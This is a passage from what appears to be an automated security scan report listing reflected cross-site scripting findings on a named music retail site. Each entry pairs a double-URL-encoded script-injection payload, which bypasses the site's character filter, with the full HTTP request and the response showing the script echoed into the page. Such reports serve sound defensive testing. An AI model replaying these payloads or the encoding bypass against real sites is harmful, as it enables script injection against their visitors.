<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Caralee McElroy88d30"><script>alert(1)</script>d2ece26075f" />
...[SNIP]...

1.103. http://www.insound.com/search/query/Caramel&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Caramel&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c641f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e53d985b4f4b was submitted in the REST URL parameter 3. This input was echoed as c641f"><script>alert(1)</script>53d985b4f4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Caramelc641f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e53d985b4f4b&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=cetmjhfjvf7q57i7bnhsamkbu4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:51 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=526242165; expires=Sun, 09-Jan-2011 02:39:51 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=410096197; expires=Sun, 09-Jan-2011 02:39:51 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Caramelc641f"><script>alert(1)</script>53d985b4f4b" />
...[SNIP]...

1.104. http://www.insound.com/search/query/Caramel&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Caramel&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 65d67%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5b8a20a80ce was submitted in the REST URL parameter 3. This input was echoed as 65d67</title><script>alert(1)</script>5b8a20a80ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Caramel65d67%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5b8a20a80ce&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=sg0mh72lqtjsuducoehtlbpt94; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=378862497; expires=Sun, 09-Jan-2011 02:39:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=248680778; expires=Sun, 09-Jan-2011 02:39:58 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Caramel65d67</title><script>alert(1)</script>5b8a20a80ce</title>
...[SNIP]...

1.105. http://www.insound.com/search/query/Carbon/Silicon&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Carbon/Silicon&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 668a8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eec519e9d99d was submitted in the REST URL parameter 3. This input was echoed as 668a8"><script>alert(1)</script>ec519e9d99d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Carbon668a8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eec519e9d99d/Silicon&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=95k0gvbvd89if148q55pie9ab1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: CFID=548545425; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=189792977; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Carbon668a8"><script>alert(1)</script>ec519e9d99d" />
...[SNIP]...

1.106. http://www.insound.com/search/query/Carbon/Silicon&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Carbon/Silicon&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 345cd%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee6f039d92e0 was submitted in the REST URL parameter 3. This input was echoed as 345cd</title><script>alert(1)</script>e6f039d92e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Carbon345cd%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee6f039d92e0/Silicon&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=8s05jm2gmo8s614j23mo86j4n6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: CFID=519298234; expires=Sun, 09-Jan-2011 02:40:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=455530096; expires=Sun, 09-Jan-2011 02:40:08 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Carbon345cd</title><script>alert(1)</script>e6f039d92e0</title>
...[SNIP]...

1.107. http://www.insound.com/search/query/Cardia&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cardia&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 67e5f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57b4b955292 was submitted in the REST URL parameter 3. This input was echoed as 67e5f</title><script>alert(1)</script>57b4b955292 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cardia67e5f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57b4b955292&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=susm8tpsb697r5lfd0ckeccsf1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=362539891; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=117876669; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Cardia67e5f</title><script>alert(1)</script>57b4b955292</title>
...[SNIP]...

1.108. http://www.insound.com/search/query/Cardia&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cardia&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2822d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ead1080e859e was submitted in the REST URL parameter 3. This input was echoed as 2822d"><script>alert(1)</script>ad1080e859e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cardia2822d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ead1080e859e&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=lst2p8d8rnqn1djht20qf55957; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:56 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=148217325; expires=Sun, 09-Jan-2011 02:39:56 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=259421859; expires=Sun, 09-Jan-2011 02:39:56 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Cardia2822d"><script>alert(1)</script>ad1080e859e" />
...[SNIP]...

1.109. http://www.insound.com/search/query/Carissa's%20Wierd&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Carissa's%20Wierd&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4ca7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6431cf88b5a was submitted in the REST URL parameter 3. This input was echoed as d4ca7"><script>alert(1)</script>6431cf88b5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Carissa's%20Wierdd4ca7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6431cf88b5a&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=93jamcqg3tl6c20fjmfsebkok3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:12 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=262737656; expires=Sun, 09-Jan-2011 02:40:12 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=106756444; expires=Sun, 09-Jan-2011 02:40:12 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Carissa's Wierdd4ca7"><script>alert(1)</script>6431cf88b5a" />
...[SNIP]...

1.110. http://www.insound.com/search/query/Carissa's%20Wierd&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Carissa's%20Wierd&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload f4864%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb2b5185e950 was submitted in the REST URL parameter 3. This input was echoed as f4864</title><script>alert(1)</script>b2b5185e950 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Carissa's%20Wierdf4864%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb2b5185e950&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=tgols79kuj4a014n0if3h9j2m7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:17 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=161967005; expires=Sun, 09-Jan-2011 02:40:17 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=114845230; expires=Sun, 09-Jan-2011 02:40:17 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Carissa's Wierdf4864</title><script>alert(1)</script>b2b5185e950</title>
...[SNIP]...

1.111. http://www.insound.com/search/query/Cassie&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cassie&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1fdd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed7d46d9c1 was submitted in the REST URL parameter 3. This input was echoed as c1fdd"><script>alert(1)</script>d7d46d9c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cassiec1fdd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed7d46d9c1&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=agrceq520jknf26gmuk71d5236; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=151918547; expires=Sun, 09-Jan-2011 02:40:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=112073596; expires=Sun, 09-Jan-2011 02:40:46 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Cassiec1fdd"><script>alert(1)</script>d7d46d9c1" />
...[SNIP]...

1.112. http://www.insound.com/search/query/Cassie&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cassie&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b73ef%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2fb05f808 was submitted in the REST URL parameter 3. This input was echoed as b73ef</title><script>alert(1)</script>e2fb05f808 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cassieb73ef%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2fb05f808&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=h66osqkllcnmdrmldgd3lo9243; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=349904803; expires=Sun, 09-Jan-2011 02:40:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=18646576; expires=Sun, 09-Jan-2011 02:40:52 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Cassieb73ef</title><script>alert(1)</script>e2fb05f808</title>
...[SNIP]...

1.113. http://www.insound.com/search/query/Curren$y&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Curren$y&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 62953%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0126adc5a5e was submitted in the REST URL parameter 3. This input was echoed as 62953</title><script>alert(1)</script>0126adc5a5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Curren$y62953%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0126adc5a5e&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=iq9mlpk0f9j9d3nbon0jd2got5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:09 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=7798718; expires=Sun, 09-Jan-2011 02:40:09 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=472738894; expires=Sun, 09-Jan-2011 02:40:09 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Curren$y62953</title><script>alert(1)</script>0126adc5a5e</title>
...[SNIP]...

1.114. http://www.insound.com/search/query/Curren$y&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Curren$y&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccac5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec8e0ea4401f was submitted in the REST URL parameter 3. This input was echoed as ccac5"><script>alert(1)</script>c8e0ea4401f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Curren$yccac5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec8e0ea4401f&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=n501ndjo7k6n5uqou6g9hrhqp3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=462755530; expires=Sun, 09-Jan-2011 02:40:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=184402737; expires=Sun, 09-Jan-2011 02:40:02 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18996

